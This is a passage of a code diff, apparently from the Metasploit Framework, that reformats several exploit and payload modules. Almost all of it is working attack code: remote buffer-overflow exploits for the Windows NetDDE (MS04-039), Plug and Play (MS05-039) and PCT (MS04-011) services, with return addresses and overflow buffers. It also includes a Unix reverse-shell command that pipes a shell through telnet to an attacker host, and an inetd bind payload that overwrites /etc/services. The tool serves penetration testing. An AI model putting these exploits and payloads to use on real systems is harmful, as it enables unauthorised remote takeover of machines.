},
'Author' => [ 'pusscat' ],
'License' => MSF_LICENSE,
@ -27,15 +27,15 @@ class Exploits::Windows::Smb::MS04_039_NETDDE < Msf::Exploit::Remote
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Space' => (0x600 - (133*4) - 4),
'BadChars' => "\\/.:$\x00", # \ / . : $ NULL
'Prepend' => 'A' * 8,
'Space' => (0x600 - (133*4) - 4),
'BadChars' => "\\/.:$\x00", # \ / . : $ NULL
'Prepend' => 'A' * 8,
},
'Targets' =>
[
@ -48,43 +48,42 @@ class Exploits::Windows::Smb::MS04_039_NETDDE < Msf::Exploit::Remote
],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('SMBPIPE', [ true, "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'nddeapi']),
], self.class)
register_options(
[
OptString.new('SMBPIPE', [ true, "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'nddeapi']),
], self.class)
end
def exploit
connect
print_status("Trying target #{target.name}...")
handle = dcerpc_handle('2f5f3220-c126-1076-b549-074d078619da', '1.2', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
connect
print_status("Trying target #{target.name}...")
handle = dcerpc_handle('2f5f3220-c126-1076-b549-074d078619da', '1.2', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
retOverWrite =
'AA' + (NDR.long(target['Rets'][0]) * 133) + payload.encoded
retOverWrite =
'AA' + (NDR.long(target['Rets'][0]) * 133) + payload.encoded
overflowChunk =
retOverWrite +
NDR.long(0xCA7CA7) + # Mew. 3 bytes enter. 1 byte null.
NDR.long(0x0)
overflowChunk =
retOverWrite +
NDR.long(0xCA7CA7) + # Mew. 3 bytes enter. 1 byte null.
NDR.long(0x0)
stubdata =
NDR.UnicodeConformantVaryingStringPreBuilt(overflowChunk) +
NDR.long(rand(0xFFFFFFFF))
stubdata =
NDR.UnicodeConformantVaryingStringPreBuilt(overflowChunk) +
NDR.long(rand(0xFFFFFFFF))
print_status('sending exploit ...')
begin
response = dcerpc.call(0xc, stubdata)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
end
print_status('sending exploit ...')
handler
disconnect
begin
response = dcerpc.call(0xc, stubdata)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
end
handler
disconnect
end
end

70
modules/exploits/windows/smb/ms05_039_pnp.rb
View File

@ -46,38 +46,36 @@ class Exploits::Windows::Smb::MS05_039_PNP < Msf::Exploit::Remote
# -ws2ord XXX?
},
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 2000 SP0-SP4', # Tested OK - 11/25/2005 hdm
{
'Platform' => 'win',
'Ret' => 0x767a38f6, # umpnpmgr.dll
},
],
[
'Windows 2000 SP4 French',
{
'Platform' => 'win',
'Ret' => 0x767438f6, # French target by ExaProbe <fmourron@exaprobe.com>
},
],
[
'Windows 2000 SP4 Spanish',
{
'Platform' => 'win',
'Ret' => 0x767738f6, # umpnpmgr.dll
},
],
[
'Windows 2000 SP0-SP4 German',
{
'Platform' => 'win',
'Ret' => 0x767338f6, # German target by Michael Thumann <mthumann@ernw.de>
},
],
],
'DefaultTarget' => 0,
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 9 2005'))
register_options(
@ -90,48 +88,50 @@ class Exploits::Windows::Smb::MS05_039_PNP < Msf::Exploit::Remote
def pnp_probe(req)
connect()
handle = dcerpc_handle('8d9f4e40-a03d-11ce-8f69-08003e30051b', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
handle = dcerpc_handle('8d9f4e40-a03d-11ce-8f69-08003e30051b', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
# CS_DES
cs_des = NDR.long(0) + # CSD_SignatureLength
NDR.long(0) + # CSD_LegacyDataOffset
NDR.long(req.length) + # CSD_LegacyDataSize
NDR.long(0) + # CSD_Flags
Rex::Text.rand_text(16) + # GUID
req # CSD_LegacyData
cs_des =
NDR.long(0) + # CSD_SignatureLength
NDR.long(0) + # CSD_LegacyDataOffset
NDR.long(req.length) + # CSD_LegacyDataSize
NDR.long(0) + # CSD_Flags
Rex::Text.rand_text(16) + # GUID
req # CSD_LegacyData
# PNP_QueryResConfList(L"a\\b\\c", 0xffff, (char *)pClassResource, 1000, foo, 4, 0);
# ResourceName:
stubdata = NDR.UnicodeConformantVaryingString("a\\b\\c") + # ResourceName, passes both IsLegalDeviceId and IsRootDeviceID
NDR.long(0xffff) + # ResourceID: ResType_ClassSpecific
NDR.UniConformantArray(cs_des) + # Resource (our CS_DES structure)
NDR.long(cs_des.length) + # ResourceLen
NDR.long(4) + # OutputLen (at least 4)
NDR.long(0) # Flags
stubdata =
NDR.UnicodeConformantVaryingString("a\\b\\c") + # ResourceName, passes both IsLegalDeviceId and IsRootDeviceID
NDR.long(0xffff) + # ResourceID: ResType_ClassSpecific
NDR.UniConformantArray(cs_des) + # Resource (our CS_DES structure)
NDR.long(cs_des.length) + # ResourceLen
NDR.long(4) + # OutputLen (at least 4)
NDR.long(0) # Flags
begin
dcerpc.call(0x36, stubdata)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
print_status('server did not respond, but we do not expect it to.')
else
print_status('should be owned now...')
end
begin
dcerpc.call(0x36, stubdata)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
print_status('server did not respond, but we do not expect it to.')
else
print_status('should be owned now...')
end
# Cleanup
handler
disconnect
if (dcerpc.last_response != nil and
dcerpc.last_response.stub_data != nil and
dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00")
return true
else
return false
end
if (dcerpc.last_response != nil and
dcerpc.last_response.stub_data != nil and
dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00")
return true
else
return false
end
end
def check

2
modules/exploits/windows/ssl/ms04_011_pct.rb
View File

@ -121,7 +121,7 @@ class Exploits::Windows::Ssl::MS04_011_PCT < Msf::Exploit::Remote
# 8f8201000000 => pop [esi+1]
# eb0f => jmp short 11 to shellcode
buf = "\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00"+
buf = "\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00"+
"\xeb\x0f" + 'XXXXXXXXXXX' +
[target.ret ^ 0xffffffff].pack('V')+
payload.encoded

2
modules/payloads/singles/cmd/unix/bind_inetd.rb
View File

@ -66,7 +66,7 @@ module BindInetd
# Next try the Irix inetd path
"/usr/etc/inetd -s #{tmp_inet};" +
# Overwrite services with the "clean" version
# Overwrite services with the "clean" version
"cp #{tmp_services} /etc/services;" +
# Delete our configuration file

6
modules/payloads/singles/cmd/unix/reverse.rb
View File

@ -45,9 +45,9 @@ module Reverse
def command_string
cmd =
"sleep 7200|" +
"telnet #{datastore['LHOST']} #{datastore['LPORT']}|" +
"while : ; do sh && break; done 2>&1|" +
"telnet #{datastore['LHOST']} #{datastore['LPORT']}"
"telnet #{datastore['LHOST']} #{datastore['LPORT']}|" +
"while : ; do sh && break; done 2>&1|" +
"telnet #{datastore['LHOST']} #{datastore['LPORT']}"
return cmd
end